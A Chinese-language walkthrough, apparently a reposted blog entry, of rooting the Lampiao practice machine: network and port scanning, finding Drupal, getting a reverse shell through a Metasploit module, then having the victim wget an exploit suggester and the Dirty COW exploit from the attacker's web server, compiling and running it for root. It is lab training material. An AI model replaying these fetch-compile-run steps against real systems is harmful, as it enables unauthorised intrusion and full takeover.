当前位置: 代码迷 >> 综合 >> OSCP Lampiao 靶机渗透
  详细解决方案

OSCP Lampiao 靶机渗透

热度:87   发布时间:2023-10-22 01:58:18.0

Lampiao 靶机渗透

目标:得到root权限
作者:shadow
时间:2021-03-22

请注意:对于所有计算机,我已经使用VMware运行下载的计算机。我将使用Kali Linux作为攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,概不负责。

一、信息收集

netdiscover -i eth0

Lampiao主机ip为172.16.1.15

OSCP Lampiao 靶机渗透

nmap扫下所有端口

nmap -p- -A 172.16.1.15

OSCP Lampiao 靶机渗透

看下有两个http,看下80端口,就这样一个东西,查看源代码也没有,估计是修改了默认端口

OSCP Lampiao 靶机渗透

我们再看下1898端口

OSCP Lampiao 靶机渗透

是个登录页面,我们dirb下看看目录下有什么

dirb http://172.16.1.15:1898

OSCP Lampiao 靶机渗透

发现了robots.txt,我们看看写了什么,原来是一个访问控制列表,我们在这里发现了敏感文件CHANGELOG.txt,更新日志

OSCP Lampiao 靶机渗透

查看更新日志,发现是Drupal的

OSCP Lampiao 靶机渗透

二、web渗透

我们使用msf查看下是否有渗透脚本

msfconsole

search Drupal

使用这个漏洞

OSCP Lampiao 靶机渗透

配置成如下然后直接run

OSCP Lampiao 靶机渗透

成功反弹shell,我们改为交互式shell

python -c 'import pty;pty.spawn("/bin/sh")'

OSCP Lampiao 靶机渗透

OSCP Lampiao 靶机渗透

三、提权

我们试试自动检测,看看有没有直接提权的exploiot

在/var/www/html目录下下载exploit suggester

git clone https://github.com/mzet-/linux-exploit-suggester

mv linux-exploit-suggester.sh ..

开启服务

service apache2 start

然后使用受害机下载

wget http://172.16.1.4/linux-exploit-suggester.sh

赋予执行权限并运行

chmod +x linux-exploit-suggester.sh

./linux-exploit-suggester.sh

发现可能存在的漏洞dirtycow

OSCP Lampiao 靶机渗透

网上搜索找到exploit 40847

OSCP Lampiao 靶机渗透

由于是c++文件,我们将下载代码保存为lampiao.cpp

然后移动文件到我们的apache2文件夹下

mv lampiao /var/www/html

受害机下载我们的文件

wget http://172.16.1.4/lampiao.cpp

OSCP Lampiao 靶机渗透

然后进行编译

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow lampiao.cpp -lutil

赋予执行权限

chmod +x dcow

执行,成功获得root密码

./dcow

OSCP Lampiao 靶机渗透

切换到root用户输入密码,成功获得root权限

OSCP Lampiao 靶机渗透

四、总结

这次靶机没什么难度,主要是尝试msf时候花费了点时间